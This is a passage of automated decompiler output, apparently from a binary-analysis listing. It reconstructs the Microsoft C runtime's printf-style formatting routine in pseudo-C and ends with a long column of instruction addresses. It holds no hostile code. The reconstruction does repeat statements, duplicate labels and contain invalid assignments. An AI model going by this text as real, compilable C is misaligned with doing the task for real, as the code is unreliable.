                            													 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            													__eflags =  *(__ebp - 0x10) & 0x00000810;
                            													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            														L101:
                            														__eflags =  *(__ebp - 4);
                            														if( *(__ebp - 4) == 0) {
                            															__edx =  *0x60b4f0; // 0x407424
                            															 *(__ebp - 4) = __edx;
                            														}
                            														__eax =  *(__ebp - 4);
                            														 *(__ebp - 0x28c) =  *(__ebp - 4);
                            														while(1) {
                            															L104:
                            															__ecx =  *(__ebp - 0x290);
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															__eflags = __ecx;
                            															if(__ecx == 0) {
                            																break;
                            															}
                            															L105:
                            															__eax =  *(__ebp - 0x28c);
                            															__ecx =  *( *(__ebp - 0x28c));
                            															__eflags = __ecx;
                            															if(__ecx == 0) {
                            																break;
                            															}
                            															L106:
                            															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            														}
                            														L107:
                            														__eax =  *(__ebp - 0x28c);
                            														__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            														__eflags = __eax;
                            														 *(__ebp - 0x24) = __eax;
                            														goto L108;
                            													} else {
                            														L94:
                            														__eflags =  *(__ebp - 4);
                            														if( *(__ebp - 4) == 0) {
                            															__eax =  *0x60b4f4; // 0x407414
                            															 *(__ebp - 4) = __eax;
                            														}
                            														 *(__ebp - 0xc) = 1;
                            														__ecx =  *(__ebp - 4);
                            														 *(__ebp - 0x294) =  *(__ebp - 4);
                            														while(1) {
                            															L97:
                            															__edx =  *(__ebp - 0x290);
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            															__eflags =  *(__ebp - 0x290);
                            															if( *(__ebp - 0x290) == 0) {
                            																break;
                            															}
                            															L98:
                            															__ecx =  *(__ebp - 0x294);
                            															__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            															__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            															if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																break;
                            															}
                            															L99:
                            															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            														}
                            														L100:
                            														 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            														__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            														 *(__ebp - 0x24) = __ecx;
                            														L108:
                            														while(1) {
                            															L190:
                            															if( *(_t627 - 0x28) != 0) {
                            																goto L216;
                            															}
                            															goto L191;
                            														}
                            													}
                            												case 0xc:
                            													L144:
                            													 *(__ebp - 8) = 0xa;
                            													goto L153;
                            												case 0xd:
                            													L147:
                            													 *(__ebp - 0x260) = 0x27;
                            													L148:
                            													 *(__ebp - 8) = 0x10;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														 *((char*)(__ebp - 0x14)) = 0x30;
                            														 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            														__eflags =  *(__ebp - 0x260) + 0x51;
                            														 *((char*)(__ebp - 0x13)) = __al;
                            														 *(__ebp - 0x1c) = 2;
                            													}
                            													L153:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            													__eflags =  *(__ebp - 0x10) & 0x00008000;
                            													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            														__eflags =  *(__ebp - 0x10) & 0x00001000;
                            														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            															__eflags =  *(__ebp - 0x10) & 0x00000020;
                            															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																	__ecx = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	__edx = 0;
                            																	__eflags = 0;
                            																	 *(__ebp - 0x2b8) = __eax;
                            																	 *(__ebp - 0x2b4) = 0;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	asm("cdq");
                            																	 *(__ebp - 0x2b8) = __eax;
                            																	 *(__ebp - 0x2b4) = __edx;
                            																}
                            															} else {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																	__ecx = __ebp + 0x14;
                            																	E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																	asm("cdq");
                            																	 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            																	 *(__ebp - 0x2b4) = __edx;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	__eax = E0041C290(__ebp + 0x14);
                            																	__ax = __eax;
                            																	asm("cdq");
                            																	 *(__ebp - 0x2b8) = __eax;
                            																	 *(__ebp - 0x2b4) = __edx;
                            																}
                            															}
                            														} else {
                            															__eax = __ebp + 0x14;
                            															 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            															 *(__ebp - 0x2b4) = __edx;
                            														}
                            													} else {
                            														__ecx = __ebp + 0x14;
                            														 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            														 *(__ebp - 0x2b4) = __edx;
                            													}
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            													__eflags =  *(__ebp - 0x10) & 0x00000040;
                            													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            														L170:
                            														__ecx =  *(__ebp - 0x2b8);
                            														 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
                            														__edx =  *(__ebp - 0x2b4);
                            														 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
                            														goto L171;
                            													} else {
                            														L166:
                            														__eflags =  *(__ebp - 0x2b4);
                            														if(__eflags > 0) {
                            															goto L170;
                            														}
                            														L167:
                            														if(__eflags < 0) {
                            															L169:
                            															 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
                            															__edx =  *(__ebp - 0x2b4);
                            															asm("adc edx, 0x0");
                            															__edx =  ~( *(__ebp - 0x2b4));
                            															 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
                            															 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            															L171:
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            															__eflags =  *(__ebp - 0x10) & 0x00008000;
                            															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																	__edx =  *(__ebp - 0x2c0);
                            																	__eax =  *(__ebp - 0x2bc);
                            																	__eax =  *(__ebp - 0x2bc) & 0x00000000;
                            																	__eflags = __eax;
                            																	 *(__ebp - 0x2bc) = __eax;
                            																}
                            															}
                            															__eflags =  *(__ebp - 0x30);
                            															if( *(__ebp - 0x30) >= 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            																__eflags =  *(__ebp - 0x30) - 0x200;
                            																if( *(__ebp - 0x30) > 0x200) {
                            																	 *(__ebp - 0x30) = 0x200;
                            																}
                            															} else {
                            																 *(__ebp - 0x30) = 1;
                            															}
                            															 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            															__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            															if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            																 *(__ebp - 0x1c) = 0;
                            															}
                            															__eax = __ebp - 0x49;
                            															 *(__ebp - 4) = __ebp - 0x49;
                            															while(1) {
                            																L181:
                            																__ecx =  *(__ebp - 0x30);
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) > 0) {
                            																	goto L183;
                            																}
                            																L182:
                            																 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            																__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            																if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            																	goto L186;
                            																}
                            																L183:
                            																__eax =  *(__ebp - 8);
                            																asm("cdq");
                            																__ecx =  *(__ebp - 0x2bc);
                            																__edx =  *(__ebp - 0x2c0);
                            																__eax = E0041CE40( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
                            																 *(__ebp - 0x2ac) = __eax;
                            																__eax =  *(__ebp - 8);
                            																asm("cdq");
                            																__eax =  *(__ebp - 0x2bc);
                            																__ecx =  *(__ebp - 0x2c0);
                            																 *(__ebp - 0x2c0) = E0041CDD0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
                            																 *(__ebp - 0x2bc) = __edx;
                            																__eflags =  *(__ebp - 0x2ac) - 0x39;
                            																if( *(__ebp - 0x2ac) > 0x39) {
                            																	__edx =  *(__ebp - 0x2ac);
                            																	__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
                            																	__eflags = __edx;
                            																	 *(__ebp - 0x2ac) = __edx;
                            																}
                            																__eax =  *(__ebp - 4);
                            																__cl =  *(__ebp - 0x2ac);
                            																 *( *(__ebp - 4)) = __cl;
                            																 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            																 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            																L181:
                            																__ecx =  *(__ebp - 0x30);
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) > 0) {
                            																	goto L183;
                            																}
                            																goto L182;
                            															}
                            														}
                            														L168:
                            														__eflags =  *(__ebp - 0x2b8);
                            														if( *(__ebp - 0x2b8) >= 0) {
                            															goto L170;
                            														}
                            														goto L169;
                            													}
                            												case 0xe:
                            													while(1) {
                            														L190:
                            														if( *(_t627 - 0x28) != 0) {
                            															goto L216;
                            														}
                            														goto L191;
                            													}
                            											}
                            										case 8:
                            											L30:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            											goto L33;
                            										case 9:
                            											L31:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            											goto L33;
                            										case 0xa:
                            											L29:
                            											__ecx =  *(__ebp - 0x10);
                            											__ecx =  *(__ebp - 0x10) | 0x00000001;
                            											 *(__ebp - 0x10) = __ecx;
                            											goto L33;
                            										case 0xb:
                            											L28:
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            											goto L33;
                            										case 0xc:
                            											L32:
                            											__ecx =  *(__ebp - 0x10);
                            											__ecx =  *(__ebp - 0x10) | 0x00000008;
                            											__eflags = __ecx;
                            											 *(__ebp - 0x10) = __ecx;
                            											goto L33;
                            										case 0xd:
                            											L33:
                            											goto L218;
                            									}
                            								} else {
                            									if(0 == 0) {
                            										 *(_t627 - 0x314) = 0;
                            									} else {
                            										 *(_t627 - 0x314) = 1;
                            									}
                            									_t574 =  *(_t627 - 0x314);
                            									 *(_t627 - 0x278) =  *(_t627 - 0x314);
                            									if( *(_t627 - 0x278) == 0) {
                            										_push(L"(\"Incorrect format specifier\", 0)");
                            										_push(0);
                            										_push(0x460);
                            										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            										_push(2);
                            										_t529 = L0040E1A0();
                            										_t630 = _t630 + 0x14;
                            										if(_t529 == 1) {
                            											asm("int3");
                            										}
                            									}
                            									L14:
                            									if( *(_t627 - 0x278) != 0) {
                            										goto L16;
                            									} else {
                            										 *((intOrPtr*)(L0040EC70(_t574))) = 0x16;
                            										E00411A50(_t558, _t574, _t625, _t626, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            										 *(_t627 - 0x2f0) = 0xffffffff;
                            										E0040D380(_t627 - 0x40);
                            										_t502 =  *(_t627 - 0x2f0);
                            										goto L229;
                            									}
                            								}
                            							}
                            							L219:
                            							if( *(_t627 - 0x25c) == 0) {
                            								L222:
                            								 *(_t627 - 0x334) = 1;
                            								L223:
                            								_t561 =  *(_t627 - 0x334);
                            								 *(_t627 - 0x2e0) =  *(_t627 - 0x334);
                            								if( *(_t627 - 0x2e0) == 0) {
                            									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            									_push(0);
                            									_push(0x8f5);
                            									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            									_push(2);
                            									_t507 = L0040E1A0();
                            									_t630 = _t630 + 0x14;
                            									if(_t507 == 1) {
                            										asm("int3");
                            									}
                            								}
                            								if( *(_t627 - 0x2e0) != 0) {
                            									 *(_t627 - 0x300) =  *(_t627 - 0x24c);
                            									E0040D380(_t627 - 0x40);
                            									_t502 =  *(_t627 - 0x300);
                            								} else {
                            									 *((intOrPtr*)(L0040EC70(_t561))) = 0x16;
                            									E00411A50(_t558, _t561, _t625, _t626, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            									 *(_t627 - 0x2fc) = 0xffffffff;
                            									E0040D380(_t627 - 0x40);
                            									_t502 =  *(_t627 - 0x2fc);
                            								}
                            								goto L229;
                            							}
                            							L220:
                            							if( *(_t627 - 0x25c) == 7) {
                            								goto L222;
                            							}
                            							L221:
                            							 *(_t627 - 0x334) = 0;
                            							goto L223;
                            						}
                            					} else {
                            						L116:
                            						 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            						__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            						 *(__ebp - 0x2f8) = 0xffffffff;
                            						__ecx = __ebp - 0x40;
                            						__eax = E0040D380(__ecx);
                            						__eax =  *(__ebp - 0x2f8);
                            						L229:
                            						return E00416CA0(_t502, _t558,  *(_t627 - 0x48) ^ _t627, _t598, _t625, _t626);
                            					}
                            					L118:
                            					if(( *(_t627 - 0x10) & 0x00000020) == 0) {
                            						 *( *(_t627 - 0x298)) =  *(_t627 - 0x24c);
                            					} else {
                            						 *( *(_t627 - 0x298)) =  *(_t627 - 0x24c);
                            					}
                            					 *(_t627 - 0x28) = 1;
                            					goto L190;
                            				}
                            			}
















                            0x00421d57
                            0x00421d57
                            0x00421d57
                            0x00421d57
                            0x00421d57
                            0x00421d57
                            0x00421d5b
                            0x00421d60
                            0x00421d63
                            0x00421d70
                            0x00000000
                            0x00000000
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dcd
                            0x00421e15
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x0042230c
                            0x00422312
                            0x0042231c
                            0x00422331
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x0042235c
                            0x00422368
                            0x0042237e
                            0x00422383
                            0x00422383
                            0x00422399
                            0x0042239e
                            0x004223a7
                            0x004223af
                            0x004223c5
                            0x004223ca
                            0x004223ca
                            0x004223af
                            0x004223d1
                            0x004224a5
                            0x004224b8
                            0x004224bd
                            0x00000000
                            0x004223d7
                            0x004223d7
                            0x004223db
                            0x00000000
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223ee
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x0042240c
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x00422423
                            0x00422442
                            0x00422447
                            0x0042244a
                            0x00422459
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x00422471
                            0x00422468
                            0x0042246f
                            0x0042247d
                            0x00422496
                            0x0042249b
                            0x00000000
                            0x0042249b
                            0x00000000
                            0x0042246f
                            0x004224a3
                            0x004224c0
                            0x004224c7
                            0x004224cf
                            0x004224e5
                            0x004224ea
                            0x004224ea
                            0x004224cf
                            0x004224c7
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x004224fe
                            0x00422501
                            0x00422501
                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421763
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217ca
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x0042188e
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218ee
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421902
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x00421947
                            0x0042194a
                            0x0042196a
                            0x0042196d
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195b
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x0042199f
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f5
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a26
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a54
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a5f
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6a
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a75
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a80
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8b
                            0x00421a8e
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a32
                            0x00421a35
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x00421a35
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a01
                            0x00421a04
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00421a18
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c6
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421aae
                            0x00421ab1
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421ae1
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x004222bc
                            0x004222bf
                            0x004222c2
                            0x004222c5
                            0x004222c8
                            0x004222cb
                            0x004222d1
                            0x004222d1
                            0x004222d1
                            0x004222d9
                            0x004222dd
                            0x00000000
                            0x00000000
                            0x004222df
                            0x004222df
                            0x004222e2
                            0x004222e5
                            0x004222e5
                            0x004222ea
                            0x004222ed
                            0x004222f0
                            0x004222f3
                            0x004222f6
                            0x004222f9
                            0x004222fc
                            0x004222fc
                            0x004222ff
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421ae7
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421afe
                            0x00421b04
                            0x00421b06
                            0x00421b09
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c3e
                            0x00421c43
                            0x00421c45
                            0x00421c48
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00000000
                            0x00000000
                            0x00421ba5
                            0x00421ba5
                            0x00421bb1
                            0x00421bb7
                            0x00421bbe
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd5
                            0x00421be1
                            0x00421c36
                            0x00000000
                            0x00421c36
                            0x00421bc0
                            0x00421bc0
                            0x00421bc6
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00000000
                            0x00421bef
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e7e
                            0x00421e82
                            0x00421e8d
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee2
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f5f
                            0x00421f65
                            0x00421f67
                            0x00421f6b
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f6b
                            0x00421f8d
                            0x00421f94
                            0x00421f97
                            0x00421f9c
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fcb
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdc
                            0x00421fdf
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00422302
                            0x00421e93
                            0x00421e93
                            0x00421e9a
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b5f
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00421ff9
                            0x00421ffc
                            0x00421fff
                            0x00422002
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0042205c
                            0x0042205c
                            0x00422066
                            0x00422066
                            0x0042206c
                            0x0042206e
                            0x00422071
                            0x00422071
                            0x00422077
                            0x00422077
                            0x00000000
                            0x00000000
                            0x00422014
                            0x00422014
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d24
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d31
